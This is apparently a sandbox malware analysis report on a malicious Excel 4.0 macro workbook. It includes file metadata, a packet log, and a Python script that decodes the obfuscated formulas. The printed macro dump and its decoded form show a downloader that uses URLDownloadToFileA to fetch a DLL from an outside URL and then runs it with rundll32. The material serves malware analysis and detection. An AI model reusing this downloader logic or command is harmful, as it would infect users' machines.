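Run the check on every file an Office process writes outside its own cache directories; a DLL under the profile root with an unknown extension is exactly what a loader that invokes rundll32 on a relative path needs, and the extension is chosen precisely so that extension-based filters do not see it.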

                                                                                                                                                                  Static File Info

                                                                                                                                                                  General

                                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Apr 12 15:51:16 2021, Security: 0
                                                                                                                                                                  Entropy (8bit):3.2150745788685295
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                  File name:446446.xls
                                                                                                                                                                  File size:283136
                                                                                                                                                                  MD5:1b62b4f4b16d6219dce4c6d145c5af79
                                                                                                                                                                  SHA1:d5bc46f3043119c020ae93121195aabbf151cf75
                                                                                                                                                                  SHA256:dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1
                                                                                                                                                                  SHA512:1a774ebb111463491f16a88b465e959c14ba32b6a399f108abe43fef66e61b663840998efdcd504306f3b28dd052032b82e8e642ffc9f9ed05186aaedbaf420e
                                                                                                                                                                  SSDEEP:6144:DcPiTQAVW/89BQnmlcGvgZ7r3J8b5I2JK+2vYft:mwt
                                                                                                                                                                  File Content Preview:........................>.......................'..........................."...#...$...%...&..................................................................................................................................................................

                                                                                                                                                                  File Icon

                                                                                                                                                                  Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                  Static OLE Info

                                                                                                                                                                  General

                                                                                                                                                                  Document Type:OLE
                                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                                  OLE File "446446.xls"

                                                                                                                                                                  Indicators

                                                                                                                                                                  Has Summary Info:True
                                                                                                                                                                  Application Name:Microsoft Excel
                                                                                                                                                                  Encrypted Document:False
                                                                                                                                                                  Contains Word Document Stream:False
                                                                                                                                                                  Contains Workbook/Book Stream:True
                                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                                  Flash Objects Count:
                                                                                                                                                                  Contains VBA Macros:True

                                                                                                                                                                  Summary

                                                                                                                                                                  Code Page:1251
                                                                                                                                                                  Last Saved By:5
                                                                                                                                                                  Create Time:2006-09-16 00:00:00
                                                                                                                                                                  Last Saved Time:2021-04-12 14:51:16
                                                                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                                                                  Security:0

                                                                                                                                                                  Document Summary

                                                                                                                                                                  Document Code Page:1251
                                                                                                                                                                  Thumbnail Scaling Desired:False
                                                                                                                                                                  Contains Dirty Links:False

                                                                                                                                                                  Streams

                                                                                                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                  General
                                                                                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Stream Size:4096
                                                                                                                                                                  Entropy:0.335261663834
                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 86 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                  General
                                                                                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Stream Size:4096
                                                                                                                                                                  Entropy:0.244430475899
                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . J . J . / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                                                                                                                                                                  Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 270942
                                                                                                                                                                  General
                                                                                                                                                                  Stream Path:Book
                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                                  Stream Size:270942
                                                                                                                                                                  Entropy:3.18416886572
                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                  Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 6 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X .
                                                                                                                                                                  Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                                  "=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CALL(Docs3!BX29&Docs3!BQ24&Docs3!BQ33&Docs3!BQ34,Docs3!BZ29&Docs3!CC33&Docs3!BY31&Docs3!CC35&Docs3!CC36,Docs3!CF29&Docs3!CF30,0,Docs3!BX9,Docs3!CD19,0,0)"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151
)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=Docs1!BC13()
                                                                                                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=EXEC(Docs3!BS36&Docs3!BS37&Docs3!CF43&Docs3!CF44&Docs3!CD19&Docs3!BZ37&Docs3!BZ39&Docs3!BZ43&Docs3!BZ44)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=Docs3!BA22(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,http://living-traditions.com/blogs/click.php,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\fdinmd.fii,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,RL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,UR,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Mo,,,,,,,,,,,,LDow,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,u,,,,,,,",St",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rt,,,,,,ndl,,,,,,,,,,,,,,,,,,,,,,,,,W,,,,,,l32 
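The CALL and EXEC formulas above never contain a readable API name or command line; Excel assembles them at run time by concatenating single-character and short-string cells with `&`. The following Python script is an added example (not part of the Joe Sandbox report and not a tool the report uses) that performs the same concatenation offline so an analyst can read the result without opening the workbook. The report dump does not preserve which address each fragment lives at, so the cell map below assigns the extracted fragments to the addresses the formulas reference; that assignment, the shortened copy of the dump, and the helper names (`decode_macro`, `summarize`, `resolve_arg`) are assumptions made for the example. The CALL type string is resolved but not interpreted.

```python
import re

# Constructed cell map (assumption): the report dump lists the string fragments but
# not the addresses they live at, so the addresses below are assigned to match the
# references in the CALL/EXEC formulas. The values are the fragments as extracted.
CELLS = {
    "Docs3!BX29": "U", "Docs3!BQ24": "RL", "Docs3!BQ33": "Mo", "Docs3!BQ34": "n",
    "Docs3!BZ29": "UR", "Docs3!CC33": "LDow", "Docs3!BY31": "nload",
    "Docs3!CC35": "ToFil", "Docs3!CC36": "eA",
    "Docs3!CF29": "JJC", "Docs3!CF30": "CBB",
    "Docs3!BX9": "http://living-traditions.com/blogs/click.php",
    "Docs3!CD19": "..\\fdinmd.fii",
    "Docs3!BS36": "r", "Docs3!BS37": "u", "Docs3!CF43": "ndl", "Docs3!CF44": "l32 ",
    "Docs3!BZ37": ",St", "Docs3!BZ39": "a", "Docs3!BZ43": "rt", "Docs3!BZ44": "W",
}

# Constructed, shortened copy of the macro dump: a few filler cells around the
# formulas that matter, in the same order the report shows them.
DUMP = (
    '"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)'
    "=CALL(Docs3!BX29&Docs3!BQ24&Docs3!BQ33&Docs3!BQ34,"
    "Docs3!BZ29&Docs3!CC33&Docs3!BY31&Docs3!CC35&Docs3!CC36,"
    'Docs3!CF29&Docs3!CF30,0,Docs3!BX9,Docs3!CD19,0,0)"'
    "=CHAR(151515131)=UPPER(215151615)=Docs1!BC13()"
    ",,,,,,=EXEC(Docs3!BS36&Docs3!BS37&Docs3!CF43&Docs3!CF44&Docs3!CD19"
    "&Docs3!BZ37&Docs3!BZ39&Docs3!BZ43&Docs3!BZ44)=Docs3!BA22(),,,,=HALT()"
)

FORMULA = re.compile(r"=[A-Za-z0-9_.!]+\([^()]*\)")   # one formula, no nested parentheses
FILLER = re.compile(r"=(?:COS|CHAR|UPPER)\(\d+\)")     # the junk pattern the sheet is padded with
REF = re.compile(r"[A-Za-z0-9_]+![A-Z]{1,3}[0-9]+")    # Sheet!Cell reference


def split_args(s):
    """Split a formula's argument list on top-level commas, honouring quotes and parentheses."""
    args, cur, depth, quoted = [], [], 0, False
    for ch in s:
        if ch == '"':
            quoted = not quoted
        elif not quoted:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == "," and depth == 0:
                args.append("".join(cur).strip())
                cur = []
                continue
        cur.append(ch)
    args.append("".join(cur).strip())
    return args


def resolve_arg(arg, cells):
    """Resolve 'Sheet!A1&Sheet!B2&...' to the concatenated cell values.
    Unknown references stay visible as <ref> instead of being silently dropped."""
    parts = [p.strip() for p in arg.split("&")]
    if not all(REF.fullmatch(p) for p in parts):
        return arg                        # a literal such as 0: pass through unchanged
    return "".join(cells.get(p, "<" + p + ">") for p in parts)


def decode_macro(dump, cells):
    """Return [(function_name, [resolved args]), ...] for every non-filler formula."""
    findings = []
    for f in FORMULA.findall(dump):
        if FILLER.fullmatch(f):
            continue
        name, _, rest = f[1:].partition("(")
        inner = rest[:-1]                 # drop the closing parenthesis
        args = [resolve_arg(a, cells) for a in split_args(inner)] if inner else []
        findings.append((name, args))
    return findings


def summarize(findings):
    """Pull the indicators a responder wants out of the decoded formulas."""
    out = {"api_calls": [], "commands": [], "urls": [], "halts": 0}
    for name, args in findings:
        if name == "CALL" and len(args) >= 3:
            out["api_calls"].append((args[0], args[1], args[2]))  # module, export, type string
            out["urls"].extend(a for a in args[3:] if a.lower().startswith(("http://", "https://")))
        elif name == "EXEC" and args:
            out["commands"].append(args[0])
        elif name == "HALT":
            out["halts"] += 1
    return out


if __name__ == "__main__":
    for name, args in decode_macro(DUMP, CELLS):
        print(name, args)
    print(summarize(decode_macro(DUMP, CELLS)))
```

Resolving the references gives CALL("URLMon", "URLDownloadToFileA", "JJCCBB", 0, <url>, "..\fdinmd.fii", 0, 0) followed by EXEC("rundll32 ..\fdinmd.fii,StartW"), which is exactly the rundll32 command line the sandbox recorded under the EXCEL.EXE process. Leaving unresolved references as `<Sheet!Cell>` matters in practice: a real sheet often hides one fragment in a cell the dump missed, and silently dropping it would produce a plausible but wrong API name.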

                                                                                                                                                                  Network Behavior

                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                  TCP Packets

Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Apr 12, 2021 17:12:28.653486967 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:28.784665108 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:28.784779072 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:28.785401106 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:28.917207003 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.014661074 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.014681101 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.014695883 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.014713049 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.014733076 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.014750004 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.014761925 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.014777899 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.014792919 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.014806032 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.014842987 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.014863014 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.014890909 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.145554066 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.145584106 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.145602942 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.145623922 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.145641088 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.145643950 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.145657063 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.145673037 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.145680904 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.145692110 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.145713091 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.145734072 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.145735979 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.145757914 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.145766020 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.145804882 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.148679972 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.148780107 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.276376009 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276417971 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276442051 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276468039 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276492119 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276515007 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276537895 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276536942 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.276561975 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276627064 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276638031 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.276653051 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276667118 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.276671886 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276699066 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276706934 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.276722908 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276746988 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276750088 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.276770115 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276782036 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.276793003 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.276819944 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.276882887 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.279459953 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.279510975 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.279628038 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.407495022 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407525063 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407536983 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407556057 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407571077 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407589912 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407612085 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407629967 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407644033 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.407645941 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407663107 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407679081 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407695055 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407696009 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.407711029 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407728910 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.407730103 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407747030 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407751083 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.407762051 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407778978 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407790899 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.407794952 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407809973 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407821894 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.407824993 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407840967 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407847881 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.407859087 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407866955 CEST  49714        80         192.168.2.3    64.207.186.30
Apr 12, 2021 17:12:29.407876015 CEST  80           49714      64.207.186.30  192.168.2.3
Apr 12, 2021 17:12:29.407891989 CEST  80           49714      64.207.186.30  192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.407901049 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.407936096 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.410192966 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.410219908 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.410233021 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.410244942 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.410289049 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.410351992 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.538497925 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538533926 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538554907 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538583040 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538606882 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538619995 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.538630009 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538644075 CEST4971480192.168.2.364.207.186.30
                                                                                                                                                                  Apr 12, 2021 17:12:29.538654089 CEST804971464.207.186.30192.168.2.3
                                                                                                                                                                  Apr 12, 2021 17:12:29.538677931 CEST804971464.207.186.30192.168.2.3
